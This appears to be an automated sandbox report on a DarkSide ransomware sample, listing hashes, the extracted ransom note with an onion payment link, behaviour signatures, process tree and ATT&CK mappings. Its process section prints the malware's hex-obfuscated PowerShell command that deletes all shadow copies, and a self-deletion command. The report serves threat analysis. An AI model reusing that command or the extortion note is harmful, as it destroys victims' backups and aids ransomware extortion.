Analysis

  • max time kernel
    119s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    24-01-2022 00:31

General

  • Target

    2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe

  • Size

    59KB

  • MD5

    6957d10b51d89a2a52eede8b7c3b8472

  • SHA1

    80071ebdbfbe962a124f54495b7e6082f2cb6051

  • SHA256

    2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1

  • SHA512

    c1b3680ff3d6d312ecb71bb421ccab6f4aea04e267db6dbe35a46b9a57980092005922066fdb7d1bb7b2e376bde706caa77a56553cdaea64f96b6c4997d1b018

Malware Config

Extracted

Path

C:\\README.5bede5a3.TXT

Family

darkside

Ransom Note
----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/CZEX8E0GR0AO4ASUCJE1K824OKJA1G24B8B3G0P84LJTTE7W8EC86JBE7NBXLMRT When you open our website, put the following data in the input form: Key: 0kZdK3HQhsAkUtvRl41QkOdpJvzcWnCrBjjgg5U4zfuWeTnZR5Ssjd3QLHpmbjxjo7uWzKbt8qPVuYN38TsDPI3bemd5I40ksemIzuI5OhIHZsi9cn3Wpd7OUT72FP9MyAUzR586yMsI2Ygri9in0Bf4EkG0pmBOLyRG1T788foGJQW1WxS1Qd2sMVvX0jKlbGG1zLp7g0u6buDCzSMyTjWjuVzJYufBBv7S2XvciEVvboiTNbZA4UUU6PttKERQSb018aILd6xO3ulk6fbEgZDO5tZSGn2zRevn5YXnHtg6vt1ToLe3izQOgYbs8Ja1fkfJBUYVux1ITyWBjpn0xPayKfwln8SqgMkbqiDyxEDEtFhqiffLcONMhi4TmW50loZIC6mWSaOjThWp6XSJUWPtY8Mkzs8Cs0qjPahx58iAEVIRGUVpLkMs7xPN7ydZ6wMWaOcRC1AD1JEUVTjLikXXyckgYaS6FnEv0UNEsv6QbTLSpDomIg3rEYZBib6ozrwH5n0M5wrKo8NciUBmfJWDP4XKkjznpsa05rEpuAklM0dMmZsYGVR !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!
URLs

http://darksidfqzcuhtk2.onion/CZEX8E0GR0AO4ASUCJE1K824OKJA1G24B8B3G0P84LJTTE7W8EC86JBE7NBXLMRT

Signatures

  • DarkSide

    Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

  • Modifies extensions of user files 10 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Deletes itself 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Control Panel 1 IoCs
  • Modifies registry class 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe
    "C:\Users\Admin\AppData\Local\Temp\2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe"
    1⤵
    • Modifies extensions of user files
    • Sets desktop wallpaper using registry
    • Modifies Control Panel
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:316
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1532
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\2C1E20~1.EXE >> NUL
      2⤵
      • Deletes itself
      PID:3200
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:572

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Credential Access

Credentials in Files

1
T1081

Discovery

System Information Discovery

1
T1082

Collection

Data from Local System

1
T1005

Impact

Defacement

1
T1491

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    MD5

    839f3cef3f2705f6e257cd95a7d5466d

    SHA1

    9acbed79d18991aecfad64b29256868f8da3a3a3

    SHA256

    c9c50db1750f01fd7fc6150daee5581b9e4022e1bc4ab954f14bd91f98d3ec4e

    SHA512

    1cab98077fc2f2d8d6ac1edf7ec422e5077cd877bd8185490df3eccc5f96becca7f8a4af0c07d3ff69c7ef1b317338acf2fc7e0c70211f2cc055d47dd1ca841c

  • memory/316-54-0x0000000076001000-0x0000000076003000-memory.dmp
    Filesize

    8KB

  • memory/1532-55-0x000007FEFC441000-0x000007FEFC443000-memory.dmp
    Filesize

    8KB

  • memory/1532-57-0x0000000002660000-0x0000000002662000-memory.dmp
    Filesize

    8KB

  • memory/1532-58-0x0000000002662000-0x0000000002664000-memory.dmp
    Filesize

    8KB

  • memory/1532-59-0x0000000002664000-0x0000000002667000-memory.dmp
    Filesize

    12KB

  • memory/1532-56-0x000007FEF2B00000-0x000007FEF365D000-memory.dmp
    Filesize

    11.4MB

  • memory/1532-60-0x000000000266B000-0x000000000268A000-memory.dmp
    Filesize

    124KB